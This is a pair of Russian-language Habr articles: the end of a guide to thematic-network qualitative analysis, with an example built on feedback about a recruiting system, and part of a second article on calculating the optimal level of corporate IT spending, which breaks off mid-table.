Создание тематических сетей – это только инструмент анализа, но не анализ по сути. Для того, чтобы совершить качественный анализ и продвинуться в понимании текстов, исследователь объясняет выделенные темы и определяет паттерны мышления участников исследования, которые скрываются за этими темами. Что нужно делать Шаг 10. Описание сети. Как только сеть построена, исследователь возвращается к сырым материалам и описывает содержание сети с использованием цитат из оригинальных текстов. Шаг 11. Объяснение сети. Когда для частей сети предложены примеры из текстов, исследователь приступает к их обсуждению и интерпретации.
Он возвращается к прочтению оригинальных текстов, но на этот раз читает их не линейно, а использует каркас тематической сети. Теперь он может давать объяснения текстам с точки зрения выделенных базовых, организующих и глобальных тем. Таким образом, у исследователя и его читателя появляется инструмент для понимания, обобщения и иллюстрации содержания оригинальных материалов.
В аналитическом отчете результаты анализа появляются в виде текстового блока, где обсуждаются темы, приводятся участки оригинальных текстов и дается их объяснение. Где можно ошибиться
При описании и объяснении сети рекомендуется использовать дословные цитаты из оригинальных текстов, наиболее ярко характеризующие тему, с краткой справкой об участнике исследования, или источнике, в котором была взята цитата.
Если исследователь уверен, что в данных скрыты темы, но он не может подобрать для них примеры, такой материал нельзя включать в отчет. Нужно либо провести дополнительное исследование, либо изменить методологию интерпретации данных.
Используйте правило качественного анализа: «Не все, что есть в данных, нужно включать в анализ. Но все, что включено в анализ, должно иметь подтверждение в оригинальных данных». Этап 5. Резюмирование тематической сети. На этом этапе обобщаются результаты, выделяются и обсуждаются основные темы. Что нужно делать Шаг 12. Исследователь описывает и анализирует выделенные темы. В итоговом отчете анализ представляется в форме свободного описания. Где можно ошибиться
Ценность этой части отчета – в рассуждениях исследователя и глубине погружения в анализ. Стиль этих рассуждений задается принятой коммуникацией в компании. Анализ не должен быть громоздким, но должен учитывать основное требование качественных исследований – глубокое, «трехмерное» погружение в проблему. Этап 6. Интерпретация паттернов.
Заключительный аналитический этап. Что нужно делать Шаг 13. Исследователь возвращается к первоначальным задачам, сопоставляет гипотезы с результатами, дает объяснения, предлагает интерпретации, дополняет первоначальные теоретические конструкты.
В итоговом отчете анализ представляется в форме заключения. Где можно ошибиться Выводы качественных исследований нередко оставляют у исследователей и заказчиков ощущение: «Я и так это знал!». После исследования могут опуститься руки, работа покажется бесполезной тратой времени. Однако, деятельность исследователя заключается в доказательстве гипотез. Очевидное знание (которое только кажется очевидным) не может быть взято в работу без обоснованных доказательств, если в вашей компании принят научный подход и используются исследования. Не забывайте также об известном когнитивном искажении «эффект знания задним числом», при котором информация кажется людям очевидной только после того, как они ее узнают.
Наконец, за кажущейся очевидной информацией могут скрываться новые открытия, или неподтвердившиеся частные гипотезы, которые ошибочно считались очевидными.
Вот, и все. 13 шагов, и построение тематических сетей завершено. Теперь обсудим пример использования метода в исследовании пользователей ИТ-продукта. Пример использования тематических сетей в исследовании отзывов пользователей ИТ-продукта
Используем метод тематических сетей для иллюстрации отношения пользователей к облачной системе автоматизации рекрутинга «HRP». Наша компания – совладелец этой системы, мы с самого начала участвовали в ее разработке. Cвои продукты исследовать сложнее, но попытаемся представить сокращенный пример анализа, чтобы проиллюстрировать применение метода тематических сетей, не нарушая договор о неразглашении.
Качественное исследование пользовательского опыта не предполагало анализ глубинных побуждений и неосознаваемых предубеждений (что может встречаться, например, при изучении опыта игроков компьютерных игр), поэтому анализ получился простым и очевидным. Но вполне соответствующим задаче демонстрации метода. Дано: Система существует на рынке около 2-х лет. Она хорошо известна в области сервисов автоматизации рекрутинга, заявки на тестовый доступ поступают регулярно и в желаемом количестве. Однако, много пользователей теряется при переходе от бесплатного тестирования к покупке платного доступа. Цена ежемесячного использования невысокая (ниже, чем у большинства конкурентов), поэтому гипотеза о ценовых возражениях клиентов для этого исследования отбрасывается.
Оставляют заявки релевантные пользователи: руководители компаний, рекрутеры, руководители рекрутинговых служб и руководители служб автоматизации. Гипотеза о том, что нерелевантный поток заявок влияет на плохую конверсию, также отбрасывается. Задача: узнать, какие когниции (мысли, рационализации) возникают у пользователей при тестировании системы автоматизации рекрутинга. Качественный материал исследования: Отзывы пользователей собирались неструктурированно, преимущественно из писем обратной связи и телефонных разговоров. В базу исследования вошли: отзывы, вопросы и возражения, написанные (сказанные) пользователями после знакомства с системой. Регион сбора отзывов: Россия, Беларусь, Украина, Казахстан, Литва. Количество текстов, участвующих в анализе: 40 записей.
Напомним, что при применении качественных методов исследования на первый план выходит не количество респондентов, не репрезентативность выборки и не соотношение охваченных и откликнувшихся пользователей. В таких исследованиях важны только темы (паттерны мышления, рационализации, идеи, возражения и т.д.), возникающие у пользователя при знакомстве с продуктом. Поэтому, мнения, собранные от 8 пользователей и обработанные качественными методами анализа, так же важны, как мнения, собранные от 200 пользователей. Особенно, при условии достижения «насыщения» результатов на ранних этапах сбора информации. (Термин «насыщение» в исследованиях подразумевает, что исследование можно остановить, когда темы начинают повторяться, и каждый последующий участник не приносит новых данных). Этап 1. Определение кодов. На этом этапе мы просмотрели все записи и выделили коды, емко передающие затронутые в текстах вопросы. У нас получилось 42 кода (см. таблицу ниже). Обычно для кодов подбираются схематичные, односложные названия, понятные кодировщику. Но в целях наглядности оставим в примере развернутые названия, чтобы дополнительно не давать их подробные расшифровки. Этап 2. Определение тем. Коды были объединены в 11 базовых тем, а те – в 6 организационных тем. В итоге финального обобщения получилось 2 глобальные темы: «Драйверы «ЗА» покупку системы» и «Сомнения и пожелания доработки».
Эти глобальные темы соответствовали задачам нашего исследования. При других задачах могли быть выделены другие глобальные темы. Например, «Действия для маркетинга» и «Действия для разработки». В этом заключается удобство метода тематических сетей: он достаточно гибкий и позволяет структурировать результаты под нужным углом, чтобы потом с ними было удобно работать на следующих стадиях доработки продукта.
Получились такие результаты: Этап 3. Конструирование тематической сети. Для каждой глобальной темы должна быть построена отдельная тематическая сеть. Для примера, построим сеть для первой темы: «Драйверы «ЗА» покупку системы».
Пример тематической сети отзывов пользователей ATS. Этап 4. Описание и объяснение тематической сети. (На этом этапе обсуждаются выделенные темы и приводятся дословные цитаты из оригинальных текстов. Для примера ограничимся разбором нескольких тем).
(…) Тема: «Интерфейс системы современный, красивый, приятный в использовании».
Тема «приятности» и современности интерфейса оказалась одной из лидирующих в отзывах пользователей. Часто выделяли интерфейс системы пользователи, проводившие сравнительный анализ нескольких систем автоматизации рекрутинга. Они упоминали, что система выглядит современнее и приятнее, чем другие программы, с которыми им приходилось работать. Интерфейс подкупает «простотой» и «чистотой», отсутствием лишних деталей и украшений. Евгения , руководитель направления по подбору персонала, медиа-холдинг:
«Ваша программа действительно хороша, а именно:
— простотой функционала
— нет награмаждения ненужных фич.
— к интерфейсу просто нужно привыкнуть».
В то же время, когда интерфейс рассматривался пользователями с позиции не общего восприятия, а быстрого выполнения задачи (составить заявку, назначить исполнителя, прикрепить кандидата и т.д.), упоминались, напротив, сложности, «лишние движения» и неудобства. Эти отзывы касались заложенного в систему процесса подбора и составили основу следующей темы. Тема: «К заданному в системе процессу подбора сложно адаптироваться, он не соответствует процессу подбора в компании клиента».
Пользователи отмечали сложность адаптации к заложенному в системе процессу подбора (согласование заявки, назначение исполнителей, обязательные этапы рассмотрения кандидатов и подачи обратной связи). Часто пользователи хотели адаптировать процесс к практике компании, или выступали за гибкую систему, позволяющую пропускать некоторые этапы. Олег , технический директор, ИТ-компания: «Причина – избыточность действий и информации, которая не участвует в наших процессах рекрутинга, плюс уникальность наших внутренних действий, которые не предусматриваются системой». Марина , HR-менеджер, производственный холдинг: «Постоянно поступают жалобы от Заказчиков в подразделениях о том, что процедура заполнения заявки на подбор персонала в системе чрезмерно сложная». Тема: «Опасения по поводу кражи, или потери внесенной в систему информации».
Вопросы и сомнения по поводу кражи, или потери данных встречались как в письменных отзывах о системе, так и в первичных вопросах пользователей при знакомстве с системой. Обычно угроза воспринималась в пяти возможных сценариях: 1) кража базы кандидатов провайдером сервиса (то есть, нами), 2) взлом системы и кража базы кандидатов конкурентами, 3) потеря информации из-за ошибки сотрудников клиента, 4) потеря информации из-за технических неполадок и 5) потеря информации из-за прекращения оплаченного доступа к системе. Евгения , руководитель направления по подбору персонала, медиа-холдинг:
«В нашем случае нам важно иметь всю информацию у нас в компании и максимально снизить риск потери данных.
Мы желаем Вам процветать и развиваться, но будем очень не рады, если доступ к Вашему ресурсу по той или иной причине будет прекращен и мы имеем риск потерять всю нашу базу.
Когда выбирали программу для работы не продумали эту историю».
И хотя мы сразу предоставляли гарантии сохранности информации (цитировали фрагменты договора, гарантировали ежедневное сохранение информации, ссылались на мировой опыт использования облачных сервисов и пр.), многие пользователи все равно высказывали опасения по поводу возможной потери данных.
(…) Этап 5. Резюмирование тематической сети. (На этом этапе обобщаются все темы, дается общая интерпретация результатам анализа. Пропустим этот этап, так как он задается логикой исследования и принятым стилем коммуникации в исследовательской группе и не нуждается в наглядности). Этап 6. Интерпретация паттернов. (На этом этапе темы сравниваются с гипотезами исследования, вносятся дополнения в теоретические конструкты, обсуждается, насколько мнения пользователей соответствуют представлениям разработчиков и владельцев продукта. Приведем фрагмент такого анализа).
(…)
Анализ отзывов выявил три особенно интересных обстоятельства: 1. Аналитика. В систему заложен сервис аналитики, позволяющий получать отчет в виде графиков и диаграмм по разным показателям подбора. В отдельной вкладке автоматически формируются отчеты: показатели выполнения плана и следования нормативам закрытия вакансий, воронка подбора (конверсия соискателей на каждом этапе подбора), анализ эффективности каналов привлечения кандидатов и – в перспективе – анализ взаимосвязи показателей кандидатов на собеседовании с показателями их успешности на рабочем месте (пролонгированная аналитика для проведения глобальных исследований о компании).
Для рекрутера такой сервис означает получение отчета о работе по «одному клику», а для руководителя – возможность быстро просмотреть аналитику и принять решение. Не говоря о набирающей популярность теме HR аналитики, HR Big Data и др., с сервисом аналитики можно проводить самые разные исследования в компании.
Но наше исследование показало, что тема аналитики ни разу не появилась в отзывах пользователей. Люди при тестировании системы не проявляли потребности в проведении исследований, или в быстром контроле за процессом рекрутинга. Мы считали эту функцию очень важной и потратили на нее много ресурсов разработки и дизайна, упоминали во всех рекламных материалах, делали акцент при продажах. Но оказалось, что пользователи интересовались ей по остаточному принципу. По крайней мере, в их отзывах аналитика не фигурировала.
Получив результаты, мы приняли решение уделить больше внимания презентации аналитики в тестовом доступе к системе и провести дополнительное исследование потребностей пользователей в аналитике. 2. Жесткий процесс. Задумывая концепцию системы, мы сделали ставку на автоматизацию лучших практик подбора. Наша компания много лет формировала службы рекрутинга в разных компаниях, и именно этот опыт мы решили оцифровать. Процесс в системе обучал и вел за собой, содержал «защиты от дурака», не позволял совершить стандартные ошибки в процессе согласования заявок и рассмотрения кандидатов, защищал рекрутеров от несправедливых обвинений. Это мы считали важнейшей функцией системы. В сущности, первые продажи мы строили как раз на основе продажи лучшего опыта, автоматизированного процесса.
Но общение с клиентами в процессе этих продаж зародило гипотезу, которую позже подтвердило исследование: клиенты не готовы покупать жесткий процесс и не готовы меняться под него.
Оказалось, что та функция, которую мы считали сильнейшим козырем системы, стала ее основным недостатком. Почти в каждом отзыве мы встречали просьбы сделать процесс более гибким, убрать «ненужные» этапы, «облегчить» систему. Эта находка теперь требует от нас новых решений в области разработки и маркетинга. 3. Оценка компетенций и сравнение кандидатов. Еще один интересный факт проявился в отношении третьего козыря системы – сервиса оценки и сравнения кандидатов.
В систему заложена библиотека с 500 вопросами для оценки личностных качеств и профессиональных компетенций кандидатов. К каждому вопросу предлагается по 6 вариантов ответа. После проведения собеседования система предлагает табличное сравнение кандидатов на соответствие профилю должности с выставлением баллов.
Эта функция системы – ее уникальное торговое предложение. Проведенный нами анализ рынка показал, что ни в одной другой ATS нет оценочных вопросов с вариантами ответов. Мы потратили много усилий на добавление этой функции: над созданием уникальных вопросов трудились профессиональные психологи и рекрутеры. Но исследование показало, что и в этом случае «козырь» системы воспринимается пользователями неоднозначно.
Система оценки компетенций выборочно игнорировалась пользователями. Тем, кому была нужна только система управления рекрутингом, база в 500 оценочных вопросов была не нужна. Такие пользователи сравнивали условия сервиса с простейшими конкурентами и ожидали более низкую цену. Наша цена (включающая сервис оценки компетенций) казалась им завышенной.
А пользователи, которые понимали ценность базы оценочных вопросов и уже знакомились с другими ИТ-продуктами по оценке компетенций, напротив, сомневались насчет подозрительно низкой цены. И эти сомнения в низкой цене парализовали покупку так же, как недовольство высокой ценой у первой группы пользователей.
Получив такие данные, мы приняли решение по доработке системы и адаптации модели продаж. Краткое резюме статьи 1. Методология качественных исследований включает не только качественные методы сбора информации, но и качественные методы анализа.
2. В маркетинговых и UX-исследованиях часто нарушается этап качественного анализа: данные обрабатываются интуитивно, без использования специальных методов, или применяются количественные методы.
3. Использование качественной методологии предполагает не подсчет отдельных действий пользователей, а поиск причин этих действий и сопровождающих их эмоций и размышлений. Цель качественных методов – не предсказание, а объяснение.
4. Важное требование качественного анализа: «Не все, что есть в данных, нужно включать в анализ. Но все, что включено в анализ, должно иметь подтверждение в оригинальных данных».
5. Результаты анализа качественных данных редко содержат неожиданные выводы. Но даже информация, кажущаяся очевидной, нуждается в доказательстве.
6. Метод тематических сетей – удобный метод качественного анализа. Он позволяет анализировать разные виды данных, с трудом поддающиеся другим методам анализа.
7. Метод тематических сетей состоит из 13 шагов анализа: исследовательские данные разбиваются на тематические фрагменты и последовательно группируются в темы более высокого порядка. Итогом анализа становится визуальная тематическая сеть.
8. С помощью тематической сети легко визуализировать результаты исследования в презентациях и отчетах. Сеть удобно использовать, как основание для дерева решений, или планов разработки продукта. Алгоритм метода Можно дополнительно почитать (полные тексты статей есть в открытом доступе):
1. Attride-Stirling, J. Thematic networks: an analytic tool for qualitative research / J. Attride-Stirling // Qualitative Research. – 2001. – vol. 1 no. 3. – P. 385-405.
История возникновения метода тематических сетей, описание этапов проведения, а также подробный разбор применения на примере исследования культурных репрезентаций о сексуальности.
2. Войскунский, А.Е. Качественный анализ данных / А.Е. Войскунский, C.В. Скрипкин // Вестник Московского университета. Сер. 14. Психология. – №2. –2001. – С. 93–109.
Рассуждения о разделении качественных методов сбора информации и качественных методов анализа, описание еще одного метода анализа качественных данных – Качественного контент-анализа.
3. A Survey and Thematic Analysis Approach as Input to the Design of Mobile Music GUIs / A. Tanaka [et al.]. – 2012.
Пример тематического анализа (упрощенного) в исследовании пользователей музыкальных мобильных приложений. | https://habrahabr.ru/post/317544/ |
habrahabr | Методика вычисления оптимального уровня затрат на корпоративное ИТ | ['системное администрирование', 'ит-инфраструктура', 'управление ит-инфраструктурой', 'управление ит-бюджетом'] | Как перестать бояться технологий и начать их эффективно применять
Луддиты в 1812 году разрушали станки. Примерно также сейчас поступают руководители компаний и технические специалисты при... | Как перестать бояться технологий и начать их эффективно применять Луддиты в 1812 году разрушали станки. Примерно также сейчас поступают руководители компаний и технические специалисты при оптимизации расходов на ИТ.
Сколько нужно специалистов для обслуживания 268 компьютеров? 14 серверов на 450 пользователей — это много или мало? Наши админы купили такую-то программу — это правильное решение? — подобные вопросы задают мне руководители компаний, когда пытаются разобраться, оптимальны ли затраты их компании на корпоративное ИТ или нет. Лично у меня на эти вопросы нет односложных ответов. Но даже более — я считаю, что односложные ответы на подобные вопросы только навредят компании.
Все дело в том, что корпоративное ИТ — это не просто набор оборудования, программ и небритых людей в свитерах с оленями. Это еще и рабочий инструмент, от которого зависит эффективность работы компании. По этой причине говорить об оптимальности затрат на ИТ, не понимая, как эти самые затраты влияют на бизнес, мягко говоря, недальновидно.
Ниже я хочу поделиться своим подходом к оптимизации расходов на корпоративное ИТ. Для этого я постараюсь доходчиво объяснить, какую пользу бизнес получает от информационных технологий, как считать эту пользу и соотносить с затратами, и предложу один из методов вычисления оптимального уровня затрат на ИТ. Надеюсь, что моя статья поможет некоторым руководителям компаний и техническим специалистам пересмотреть свои взгляды как на корпоративное ИТ в целом, так на оптимизацию связанных с ним расходов в частности. На этом вступление заканчиваю и перехожу к сути:
Все изложение я разбил на пять последовательных вопросов: Когда расходы на ИТ в компаниях оптимальны, и что такое точка оптимальных затрат?
Как считать пользу для бизнеса от информационных технологий и затраты на них?
Как связаны затраты на ИТ и польза для бизнеса?
Как вычислить текущее значение оптимальных затрат на ИТ?
Как надо, как не надо и зачем вообще оптимизировать затраты на ИТ?
Итак, по порядку: Когда расходы на ИТ в компаниях оптимальны, и что такое точка оптимальных затрат?
Никто никогда не запрещал компаниям работать «по старинке» — составлять договоры от руки, ездить в банк с платежками, делать копии документов “под копирку”. Никто никогда не требовал от компаний покупать компьютеры и нанимать админов. Почему тогда компьютеры применяются в бизнесе повсеместно?
Все дело в том, что информационные технологии изменили парадигму офисного труда так же, как когда-то станки изменили парадигму производства. Компьютеры позволили сократить штат сметчиков, машинисток, учетчиков, бухгалтеров и понизили профессиональные требования к офисным профессиям, сведя их, по сути, к операторам ПК. Там, где раньше требовалось несколько квалифицированных специалистов, теперь достаточно одного пользователя с компьютером.
Компании все еще могут работать «по старинке» и содержать огромный штат офисных сотрудников, но при текущем уровне развития технологий, такие затраты на офисное делопроизводство получатся несоразмерными результату или неоптимальными. Также компании могут попытаться заменить всех офисных сотрудников роботами с искусственным интеллектом, но при текущем уровне развития технологий, такие затраты на офисное делопроизводство также получатся несоразмерными результату или неоптимальными.
Информационные технологии повышают производительность труда офисных сотрудников, но пока не способны заменить их полностью. Поэтому экономический эффект от применения информационных технологий зависит от баланса между затратами на офисных сотрудников и затратами на информационные технологии. Как всегда, при выборе между двумя крайностями существует некая золотая середина, которую я называю точкой оптимальных затрат: Точка оптимальных затрат на ИТ – тот уровень затрат на ИТ, при котором общие расходы на офисное делопроизводство, включая расходы на ИТ, достигают минимального возможного значения.
Стоит отметить, что за любой точкой оптимальных затрат стоит вполне определенное оборудование, программы и технические решения. Но технический прогресс, как и бизнес не стоит на месте, и точка оптимальных затрат изменяется со временем, в то время как приобретенное когда-то оборудование и программы остаются неизменными. И если переход в новую точку оптимальных затрат связан с отказом от сделанных ранее инвестиций, то это только ухудшает экономический эффект от применения информационных технологий. По этой причине при оценке оптимальности расходов на ИТ я использую следующий критерий: Текущие расходы на ИТ оптимальны, когда они приближают компанию к достижению точки оптимальных затрат и позволяют ей удерживаться в этой точке в долгосрочной перспективе.
Тут я рискую совершенно вас запутать, поэтому давайте начнем с малого – с вычисления точки оптимальных затрат для компании в текущий момент времени. А для этого придется научиться считать создаваемую информационными технологиями пользу для бизнеса и корректно соотносить ее с затратами на ИТ. Поэтому переходим к следующему вопросу: Как считать пользу для бизнеса от информационных технологий и затраты на них?
Информационные технологии повышают производительность труда офисных сотрудников, упрощая и автоматизируя повседневную офисную рутину. За счет применения информационных технологий компания снижает трудозатраты на офисное делопроизводство и экономит рабочее время офисных сотрудников. Именно поэтому пользу от информационных технологий для бизнеса я предпочитаю считать в сэкономленном за счет их применения рабочем времени офисных сотрудников.
Чтобы сравнивать пользу от информационных технологий с затратами на них, обе эти величины необходимо привести к единой системе изменения. Для этого можно сэкономленное время офисных сотрудников преобразовать в деньги, но подобные абсолютные показатели отличаются от одной компании к другой и мало информативны. По этой причине, я предпочитаю измерять расходы на ИТ и сэкономленное время сотрудников в относительных величинах – в процентах от среднемесячного фонда оплаты труда офисных сотрудников (ФОТ).
Поскольку затраты на ИТ делятся на операционные и капитальные, то для корректного сравнения пользы для бизнеса с затратами на информационные технологии, я придерживаюсь следующих принципов расчета этих величин: При вычислении затрат на ИТ необходимо нормировать все расходы на ИТ на срок их полезного использования. Если сервер покупается на 5 лет, то он обходится компании в 1/60 (5*12 месяцев) от стоимости своего приобретения ежемесячно. Если проект делается на 3 года, то он обходится компании в 1/36 своей стоимости ежемесячно. Полученные среднемесячные затраты необходимо соотнести со среднемесячным ФОТ офисных сотрудников. При вычислении пользы для бизнеса от ИТ необходимо измерить, сколько времени ежедневно/еженедельно/ежемесячно экономит ИТ офисным сотрудникам, и соотнести полученную цифру с общим временем работы сотрудников за эти периоды. Если сотрудники в среднем работают 8-9 часов в день или около 500 минут, то каждые 5 минут повседневной рутины обходятся компании в 1% от ФОТ. Если информационные технологии сокращают повседневную рутину хотя бы на час в день, то они экономят компании 12% от ФОТ офисных сотрудников.
Далее в статье под затратами на ИТ и пользой от него для бизнеса я буду подразумевать величины, вычисленные по принципам выше.
Для компаний, которые работают не первый год, затраты на ИТ можно примерно оценить, посчитав все расходы на оборудование, программы, админов, каналы связи и картриджи за 4-5 лет и соотнеся их с фондом оплаты труда офисных сотрудников за тот же период. По моему опыту, для большинства компаний затраты на ИТ при такой модели расчета находятся в диапазоне от 5 до 15% от ФОТ. Причем, зависит это соотношение в основном от среднего размера оплаты труда в компании, а не от крутости внутреннего ИТ.
В случае подсчета абсолютной пользы от ИТ все несколько сложнее. За давностью лет уже мало кто помнит, сколько времени уходит на составление договоров на печатной машинке, переписку с клиентами через почту России, черчение на кульманах и ведение складского учета в тетрадке. Абсолютная пользы от ИТ уже давно обесценилась. Но если попытаться представить себе жизнь без компьютеров, то станет ясно, что даже самый простой компьютер и принтер (не более 4% от ФОТ в долгосрочной перспективе), экономит, как минимум, пару часов работы в день (каждый час работы — это 12% от ФОТ).
Если бы моей задачей сейчас было обосновать выгодность корпоративного ИТ, то на этой ноте можно было бы и заканчивать статью. Но моя задача – найти тот уровень затрат на ИТ, который принесет компании максимальный экономический эффект. А для этого придется разобраться со следующим вопросом: Как связаны затраты на ИТ и польза для бизнеса?
Все параметры информационных систем, которые влияют на производительность труда офисных сотрудников, можно разбить на пять общих категорий: Функциональные возможности информационных систем
Функциональные возможности – это набор действий, которые могут выполнять пользователи в информационной системе. Именно от функциональных возможностей информационных систем (и умения их применять) зависит какие офисные задачи удастся упростить или вовсе автоматизировать, а какие придется делать «по старинке».
Простота рабочего окружения
Простота рабочего окружения – это количество действий, затрачиваемых на достижение нужного результата. Необходимость постоянно искать документы на «файлопомойке», вводить десятки логинов/паролей на доступ к разным системам, заходить в меню энной степени вложенности, или бегать до принтера в дальний конец коридора только усложняет рабочее окружение и отнимает рабочее время сотрудников.
Эргономичность рабочих мест пользователей
Эргономика – это соответствие рабочего места физиологическим особенностям человека. Если сотрудникам неудобно сидеть за компьютером, если у них болят глаза от монитора или пальцы от клавиатуры, то они чаще отвлекаются и меньше работают. Ни одна система мотивации не устоит перед резью в глазах от дешевого монитора или перед болью в спине из-за неудобного кресла.
Скорость информационных систем
Со скоростью работы информационных систем все просто — приходится сотрудникам ждать, когда система сообразит (запустится/посчитает/выдаст нужную информацию) или не приходится. Чем выше скорость систем, тем меньше времени офисные сотрудники теряют в ожидании отклика от нее.
Надежность информационных систем и оперативность техподдержки
От надежности информационных систем и оперативности технической поддержки зависит, сколько времени офисным сотрудникам приходится тратить на общение с айтишниками, вместо работы. Правда помимо общения с админами, в некоторых случаях, офисным сотрудникам приходится еще и переделывать работу, которая потерялась в результате сбоя, или извиняться перед клиентами за срыв сроков.
Каждая из перечисленных выше категорий может ограничивать полезный эффект от других категорий. Если информационные системы в компании или постоянно ломаются, или дико тормозят, или не имеют нужного в работе функционала или если рабочее окружение офисных сотрудников слишком сложное или неудобное, то не имеет значения, насколько хорошо сделано все остальное – производительность офисных сотрудников будет низкая.
Если перейти к аналогиям, все перечисленные выше критерии влияют на производительность труда офисных сотрудников также, как пять вентилей на одной трубе влияют на объем пропускаемой через нее жидкости. Если какой-то из вентилей закручен на полную, то не имеет значения, насколько широко открыты остальные четыре – объем пропускаемой жидкости будет низким.
Но если в случае трубы достаточно раскрутить все пять вентилей, то в случае информационных систем, раскрутить все пять категории качества на полную катушку не по карману большинству компаний. В итоге, каждая из категорий остается «полуоткрытой», и следствие такой «полуоткрытости» — наличие перекосов, при которых одна из категорий ограничивает производительность остальных. Такой перекос означает, что вложенные в ИТ деньги не дают полной отдачи или, по-другому, — вложенные в ИТ деньги работают не эффективно. И тут мы приходим к следующему важному определению: Эффективная конфигурация информационных систем – это такой набор технических решений, а также параметров их настройки и обслуживания, которые для текущего уровня затрат на ИТ обеспечивают максимально возможную производительность труда офисных сотрудников.
Если теперь составить зависимость пользы для бизнеса от затрат на ИТ, в которой каждому уровню затрат соответствует наиболее эффективная конфигурация информационных систем, то получим некую оптимальную зависимость, которую я в дальнейшем буду обозначать как P(x): Оптимальная зависимость пользы для бизнеса (P) от затрат на информационные технологии (x) – это такая зависимость, в которой каждому уровню затрат на ИТ соответствует наиболее эффективная для такого уровня затрат конфигурация информационных систем .
Если эскизно представить зависимость пользы для бизнеса от затрат на ИТ, то оптимальная зависимость P(x) на графике будет выглядеть примерно так (красный пунктир): Рисунок 1. Эскиз оптимальной зависимости пользы для бизнеса от затрат на информационные технологии (P(x) – красный пунктир на графике).
Несколько пояснений по эскизу выше: Поскольку я измеряю пользу для бизнеса в сэкономленном фонде оплаты труда офисных сотрудников, то максимальный прирост пользы для бизнеса от применения информационных технологий относительно текущего значения не может превышать текущие трудозатраты на офисное делопроизводство. Или иначе, функция P(x) имеет предельное значение. Правда чтобы достичь этот предел, придется заменить всех офисных сотрудников на роботов и нейронные сети.
Существует такой уровень затрат на ИТ, при котором затраты и польза для бизнеса от информационных технологий равны. Для обозначения этой точки на эскизе я провел линию P=x (синий пунктир). При текущем уровне развития технологий, замена офисных сотрудников на роботов и нейронные сети уверенно переходит в правую часть графика.
Линия x=xcur и точка Pcur – это положение текущего уровня затрат на ИТ и пользы для бизнеса от использования информационных технологий. Обычно в компаниях польза от ИТ меньше своего возможного эффективного значения – ранее я объяснял почему так происходит.
Точка P0, x0 – это и есть точка оптимальных затрат на ИТ, в которой затраты на офисное делопроизводство, включая затраты на ИТ, достигают минимального возможного значения. После точке x0 любые дополнительные инвестиции в ИТ не окупают себя.
Теперь, чтобы найти точку оптимальных затрат, нам достаточно построить оптимальную зависимость P(x) и найти на ней такое минимальное значение точки x0 для которой при любых x>x0 отношение (P(x)-P(x0))/(x-x0) Как вычислить текущее значение оптимальных затрат на ИТ?
Тут я должен оговориться, что построить оптимальную зависимость P(x) для абстрактной компании – задача не из легких, если вообще решаемая. При построении оптимальной зависимости P(x), мне лично проще отталкиваться от текущего положения дел в компании. В этом случае зависимость P(x) можно представить в следующем виде: P(x)=Pcur+P(x1,x2,x3,x4,x5)
где:
P(x) — итоговая польза от ИТ для бизнеса,
Pcur — текущая польза от ИТ для бизнеса,
x=xcur+x1+x2+x3+x4+x5 — суммарные затраты на ИТ,
xcur — текущие затраты на ИТ,
P(x1,x2,x3,x4,x5) — функция экономии рабочего времени сотрудников в зависимости от улучшения одной из пяти категорий качества информационных систем (функциональность, простота, скорость, эргономичность, надежность информационных систем и оперативность техподдержки),
x1, x2, x3, x4, x5 — дополнительные затраты на каждую из категорий качества.
Поскольку в рамках уравнения выше Pcur – это константа, то для нахождения точки оптимальных затрат достаточно построить оптимальную зависимость функции P(x1,x2,x3,x4,x5) от дополнительных затрат на ИТ (x1+x2+x3+x4+x5).
Все дальнейшее решение основывается на методе динамического программирования, который применяется как в теории вычислительных систем, так и в такой увлекательной дисциплине как «исследование операций» (в википедии есть история появления данной дисциплины – рекомендую почитать).
Для вычисления оптимального вида функции пяти переменных P(x1,x2,x3,x4,x5) следует сначала вычислить оптимальный вид пяти функции одной переменной: P(x1,0,0,0,0), P(0,x2,0,0,0), P(0,0,x3,0,0), P(0,0,0,x4,0), P(0,0,0,0,x5). Для этого нужно разобраться, что компания недополучает в текущий момент по каждой из категорий качества, с чем связаны эти потери и сколько стоит их устранить.
Для измерения текущих потерь по каждой из категорий качества нужно найти ответы на пять вопросов: Сколько сотрудники теряют времени из-за недостатка функциональности?
Сколько времени отнимает у сотрудников излишняя сложность систем?
Сколько сотрудники тратят времени на “ожидание отклика системы”?
Сколько времени сотрудники отдыхают от компьютера в течение дня?
Сколько времени сотрудники простаивают из-за сбоя систем или необходимости общаться с техподдержкой?
Для ответа на эти вопросы можно использовать системы мониторинга, системы заявок, опрос пользователей, сравнительное тестирование и анализ рабочих процессов. Определяя текущие потери рабочего времени, необходимо находить и источники этих потерь и анализировать стоимость их устранения.
Составив полный список потерь и стоимостей их устранения, а также сведя эти значения к единой системе измерения (в тысячных от ФОТ), можно переходить к следующему шагу – к составлению оптимальных численных последовательностей пяти функций одной переменной. Для этого необходимо перебирать с равномерным шагом возможный размер инвестиций в каждую из категорий качества и для каждого размера инвестиций выбирать те технические решения, которые сулят максимальный экономический эффект. Полученные по таким принципам численные функции будут выглядеть примерно так (цифры ниже выдуманы и используются для демонстрации дальнейших расчетов): xi
P(xi,0,0,0,0)
P(0,xi,0,0,0)
P(0,0,xi,0,0)
P(0,0,0,xi,0)
P(0,0,0,0,xi)
1
0,5
0,5
3
5
1
2
0,5
1
3
6
4
3
9
1
3
8
6
4
10
14
8
8
10
5
14
18
9
8
17
6
15
20
15
8
19
7
15
21
15
8
20
8
15
22
15
8
21
Таблица 1. Иллюстрация численной зависимости каждой из категорий качества информационных систем от дополнительных инвестиций в них. Цифры в таблице используются для иллюстрации вычислений и являются вымыслом автора.
Небольшое уточнение — xi — это объем дополнительных инвестиций в каждую из категорий качества, относительно текущего размера затрат. Определять ее нужно как разницу между стоимостью используемого решения и нового. То есть xi — это не стоимость новой крутой железки или программы, а разница в стоимость новой крутой и старой попроще (с учетом их полезного срока использования).
Если предположить, что все шесть категорий качества не влияют друг на друга и являются аддитивными (на практике это не совсем так), то функцию P(x1,x2,x3,x4,x5) можно представить в следующем виде: P(x1,x2,x3,x4,x5)=P(x1,0,0,0,0)+P(0,x2,0,0,0)+P(0,0,x3,0,0)+P(0,0,0,x4,0)+P(0,0,0,0,x5)
Опираясь на это допущение и зная численные зависимости каждой из пяти функций одной переменной, можно составить оптимальную зависимость P(x1,x2,x3,x4,x5) от ∆x=x1+x2+x3+x4+x5, подбирая для каждого размера инвестиций такую конфигурацию функций одной переменной, которые дают максимальный экономический эффект: ∆x
Пространство максимальных решений
Максимальное значение P(x1,x2,x3,x4,x5)
Правая производная dP/dx
1
P(0,0,0,1,0)
5
3
2
P(0,0,1,1,0)
8
1
3
